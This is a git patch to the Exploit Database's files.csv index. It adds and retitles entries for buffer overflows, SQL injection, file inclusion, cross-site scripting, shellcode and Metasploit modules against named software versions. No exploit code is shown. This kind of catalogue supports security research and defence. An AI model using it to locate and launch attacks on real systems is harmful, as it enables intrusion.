From dab1517032eba2da45ea80ea4c9b4c871429d8ef Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 Nov 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-11-22 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 13 new exploits Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC) Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC) Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference Microsoft Edge Scripting Engine - Memory Corruption (MS16-129) Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104) Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018) NTP 4.2.8p8 - Denial of Service Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit) Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) Borland Interbase - isc_create_database() Buffer Overflow (Metasploit) Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit) Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit) Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit) Borland Interbase - SVC_attach() Buffer Overflow (Metasploit) Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit) Borland Interbase - Create-Request Buffer Overflow (Metasploit) Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit) Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit) Borland Interbase - open_marker_file() Buffer Overflow (Metasploit) Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit) Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit) Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit) Borland Interbase - INET_connect() Buffer Overflow (Metasploit) Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit) Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit) Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit) phpunity.postcard - (gallery_path) Remote File Inclusion phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion 1024 CMS 0.7 - (download.php item) Remote File Disclosure 1024 CMS 0.7 - 'download.php' Remote File Disclosure cpCommerce 1.1.0 - (category.php id_category) SQL Injection CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection 1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities 1024 CMS 1.3.1 - Local File Inclusion / SQL Injection Mole 2.1.0 - (viewsource.php) Remote File Disclosure ChartDirector 4.1 - (viewsource.php) File Disclosure 724CMS 4.01 Enterprise - (index.php ID) SQL Injection My Gaming Ladder 7.5 - (ladderid) SQL Injection Mole 2.1.0 - 'viewsource.php' Remote File Disclosure ChartDirector 4.1 - 'viewsource.php' File Disclosure 724CMS 4.01 Enterprise - 'index.php' SQL Injection My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities Pligg CMS 9.9.0 - (editlink.php id) SQL Injection ExBB 0.22 - Local / Remote File Inclusion Pligg CMS 9.9.0 - 'editlink.php' SQL Injection Prediction Football 1.x - (matchid) SQL Injection Prediction Football 1.x - 'matchid' Parameter SQL Injection Free Photo Gallery Site Script - (path) File Disclosure Free Photo Gallery Site Script - 'path' Parameter File Disclosure LiveCart 1.1.1 - (category id) Blind SQL Injection Ksemail - 'index.php language' Local File Inclusion LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection Ksemail - Local File Inclusion RX Maxsoft - 'popup_img.php fotoID' SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection RX Maxsoft - 'fotoID' Parameter SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection Pollbooth 2.0 - (pollID) SQL Injection cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities Pollbooth 2.0 - 'pollID' Parameter SQL Injection CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion SmallBiz eShop - (content_id) SQL Injection SmallBiz eShop - 'content_id' Parameter SQL Injection lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection PostcardMentor - 'cat_fldAuto' Parameter SQL Injection Pligg CMS 9.9.0 - (story.php id) SQL Injection Pligg CMS 9.9.0 - 'story.php' SQL Injection LokiCMS 0.3.4 - writeconfig() Remote Command Execution LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass cpCommerce 1.2.8 - (id_document) Blind SQL Injection CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure Pligg CMS 1.0.4 - (story.php?id) SQL Injection Pligg CMS 1.0.4 - 'story.php' SQL Injection 724CMS 4.59 Enterprise - SQL Injection 724CMS Enterprise 4.59 - SQL Injection lightneasy 3.2.2 - Multiple Vulnerabilities LightNEasy 3.2.2 - Multiple Vulnerabilities My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection CPCommerce 1.1 - Manufacturer.php SQL Injection CPCommerce 1.1 - 'manufacturer.php' SQL Injection LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting LiveCart 1.0.1 - category q Parameter Cross-Site Scripting LiveCart 1.0.1 - order return Parameter Cross-Site Scripting LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection CMS Made Simple 2.1.5 - Cross-Site Scripting Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery Mezzanine 4.2.0 - Cross-Site Scripting LEPTON 2.2.2 - SQL Injection LEPTON 2.2.2 - Remote Code Execution FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery FUDforum 3.0.6 - Local File Inclusion Wordpress Plugin Olimometer 2.56 - SQL Injection --- files.csv | 126 ++++++------ platforms/java/webapps/40794.txt | 137 +++++++++++++ platforms/linux/dos/40806.py | 25 +++ platforms/linux/local/895.c | 14 +- platforms/multiple/remote/40805.rb | 300 +++++++++++++++++++++++++++++ platforms/php/webapps/40792.txt | 21 -- platforms/php/webapps/40795.html | 71 +++++++ platforms/php/webapps/40800.txt | 113 +++++++++++ platforms/php/webapps/40801.txt | 80 ++++++++ platforms/php/webapps/40802.txt | 109 +++++++++++ platforms/php/webapps/40803.txt | 58 ++++++ platforms/php/webapps/40804.txt | 126 ++++++++++++ platforms/python/webapps/40799.txt | 80 ++++++++ platforms/windows/dos/40793.html | 98 ++++++++++ platforms/windows/dos/40797.html | 89 +++++++++ platforms/windows/dos/40798.html | 49 +++++ 16 files changed, 1406 insertions(+), 90 deletions(-) create mode 100755 platforms/java/webapps/40794.txt create mode 100755 platforms/linux/dos/40806.py create mode 100755 platforms/multiple/remote/40805.rb delete mode 100755 platforms/php/webapps/40792.txt create mode 100755 platforms/php/webapps/40795.html create mode 100755 platforms/php/webapps/40800.txt create mode 100755 platforms/php/webapps/40801.txt create mode 100755 platforms/php/webapps/40802.txt create mode 100755 platforms/php/webapps/40803.txt create mode 100755 platforms/php/webapps/40804.txt create mode 100755 platforms/python/webapps/40799.txt create mode 100755 platforms/windows/dos/40793.html create mode 100755 platforms/windows/dos/40797.html create mode 100755 platforms/windows/dos/40798.html diff --git a/files.csv b/files.csv index c8dee1b1c..7501e4cc5 100755 --- a/files.csv +++ b/files.csv @@ -720,7 +720,7 @@ id,file,description,date,author,platform,type,port 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0 5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 -5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 +5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0 @@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 -40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 +40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0 40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0 @@ -5271,6 +5271,10 @@ id,file,description,date,author,platform,type,port 40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0 40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0 40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0 +40793,platforms/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos,0 +40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0 +40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0 +40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9585,7 +9589,7 @@ id,file,description,date,author,platform,type,port 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 -5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 +5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 @@ -9996,7 +10000,7 @@ id,file,description,date,author,platform,type,port 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 @@ -10010,9 +10014,9 @@ id,file,description,date,author,platform,type,port 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 -10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 @@ -10511,7 +10515,7 @@ id,file,description,date,author,platform,type,port 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 -16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16437,platforms/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 @@ -10521,13 +10525,13 @@ id,file,description,date,author,platform,type,port 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,windows,remote,0 -16447,platforms/windows/remote/16447.rb,"Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16447,platforms/windows/remote/16447.rb,"Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16449,platforms/windows/remote/16449.rb,"Borland Interbase - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16449,platforms/windows/remote/16449.rb,"Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0 -16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16453,platforms/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 @@ -10836,12 +10840,12 @@ id,file,description,date,author,platform,type,port 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0 -16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16839,platforms/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16840,platforms/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16843,platforms/linux/remote/16843.rb,"Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16844,platforms/linux/remote/16844.rb,"Borland Interbase - INET_connect() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16843,platforms/linux/remote/16843.rb,"Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16844,platforms/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 @@ -15081,6 +15085,7 @@ id,file,description,date,author,platform,type,port 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0 40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0 +40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16485,7 +16490,7 @@ id,file,description,date,author,platform,type,port 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 -2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 +2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0 @@ -17254,7 +17259,7 @@ id,file,description,date,author,platform,type,port 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 @@ -17475,7 +17480,7 @@ id,file,description,date,author,platform,type,port 3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 -3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 +3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 